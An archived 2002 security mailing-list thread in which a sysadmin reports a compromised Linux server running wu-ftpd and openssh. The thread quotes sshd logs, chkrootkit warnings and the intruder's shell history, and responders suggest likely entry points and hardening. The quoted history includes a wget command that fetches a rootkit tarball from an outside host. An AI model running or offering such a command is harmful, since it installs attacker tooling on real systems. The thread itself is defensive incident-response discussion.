hi ya ver On Wed, 11 Sep 2002, Ver Allan Sumabat wrote: > we used linux 2.4.7-10. we only opened ports 21 (ftp), > 22 (ssh), and 443 (https). > > 21 - wu-ftpd-2.6.1-20 > 22 - openssh-3.1 > 443 - tomcat-3.2.4 what does nmap say is also open ports to the outside and to the inside your corp lan ?? > 1. this is the content of /home/war's .bash_history: > > wget > wget http://mrunix.free.fr/roy/w00tkit.tgz > logout game over... they are already in your server ... - they probably got in thru wu-ftpd and/or openssh ( check the respective websites for the current ( versions you should have been running - you should NOT have been running 2.4.7-10 kernels... you should always compile your own kernel and apply your own kernel hardening apps they were trying to get more rootkits installed ( wootkit ) > 2. he was trying to send a mail to himself regarding > the system's resources: > > The original message was received at Thu, 5 Sep 2002 > 22:21:37 +0800 > from root@localhost > > ----- The following addresses had permanent fatal > errors ----- > roi_blablaat_private > (reason: 501 5.1.8 Sender domain must exist) seems really really odd that the [h/cr]acker would send themself an email to a domain that does nto exists or to reject it... must be another hacked box they are playing with ?? - more server hardening/tightening stuff http://www.Linux-Sec.net c ya alvin > > ----- Transcript of session follows ----- > ... while talking to rmail.walla.co.il.: > >>> MAIL From:<rootat_private> SIZE=2283 > <<< 501 5.1.8 Sender domain must exist > 501 5.6.0 Data format error > > 3. walla.co.il is in israel > > 4. tracing 212.179.207.211 gives israel also. > > i have moved the files to another machine and > reinstalled the server 'cause we need to put it up and > running asap. do u think the exploit was done thru > ftp? can u help me replicate it? i was looking for > procedures or scripts in ssh/ftp exploits so that i > can try to attack our server but i can not find any. > > --- Loki <lokiat_private> wrote: > > What version of SSHD were you running, check > > commonly exploited > > services. > > > > 1. SSHD (crc32) > > 2. FTPD > > 3. Apache (chunking) > > > > Get back to us with the versions you were running of > > SSH, FTP, and > > Apache and we can help you out. How hardened was the > > OS? Did you turn > > off all RPC services, etc. We need more info. > > > > Eric/Loki > > Internet Warfare and Intelligence > > Fate Research Labs > > www.fatelabs.com > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > -----Original Message----- > > From: Ver Allan Sumabat [mailto:ver_allanat_private] > > > > Sent: Tuesday, September 10, 2002 6:08 AM > > To: incidentsat_private > > Subject: possible ssh hack > > > > > > Hi, > > > > We have just recently been hacked. I have no idea > > how > > he came in. Here are my preliminary investigations: > > > > 1. He was able to add a user without logging in. > > > > **Unmatched Entries** > > Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse > > map address 10.13.41.4. > > Sep 5 10:39:35 srv1 sshd[20514]: Accepted password > > for root from 10.13.41.4 > > port 4207 > > Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse > > map address 10.13.41.4. > > Sep 5 17:30:41 srv1 sshd[23299]: Accepted password > > for root from 10.13.41.4 > > port 2491 > > Sep 5 22:16:59 srv1 useradd[23532]: new group: > > name=war, gid=502 > > Sep 5 22:16:59 srv1 useradd[23532]: new user: > > name=war, uid=502, gid=502, > > home=/home/war, shell=/bin/bash > > Sep 5 22:17:31 srv1 sshd[23534]: Accepted password > > for war from > > 212.179.207.211 port 2746 > > Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from > > socket failed: Connection > > reset by peer > > Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP; > > restarting. > > > > > > 2. He installed a tarball w00tkit.tgz in /home/war > > > > 3. After running chkrootkit, the significant lines > > are: > > > > ... > > Checking `ifconfig'... INFECTED > > ... > > Searching for Showtee... Warning: Possible Showtee > > Rootkit installed > > ... > > Checking `lkm'... You have 1 process hidden for > > ps > > command > > Warning: Possible LKM Trojan installed > > > > 4. ssh won't run anymore > > > > Can anyone help me on how the intrusion was done? > > > > Thanks. > > > > Regards, > > > > Allan > > > > __________________________________________________ > > Yahoo! - We Remember > > 9-11: A tribute to the more than 3,000 lives lost > > http://dir.remember.yahoo.com/tribute > > > > > ------------------------------------------------------------------------ > > ---- > > This list is provided by the SecurityFocus ARIS > > analyzer service. For > > more information on this free incident handling, > > management > > and tracking system please see: > > http://aris.securityfocus.com > > > > > > > ---------------------------------------------------------------------------- > > This list is provided by the SecurityFocus ARIS > > analyzer service. > > For more information on this free incident handling, > > management > > and tracking system please see: > > http://aris.securityfocus.com > > > > __________________________________________________ > Do you Yahoo!? > Yahoo! News - Today's headlines > http://news.yahoo.com > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Sep 12 2002 - 23:06:00 PDT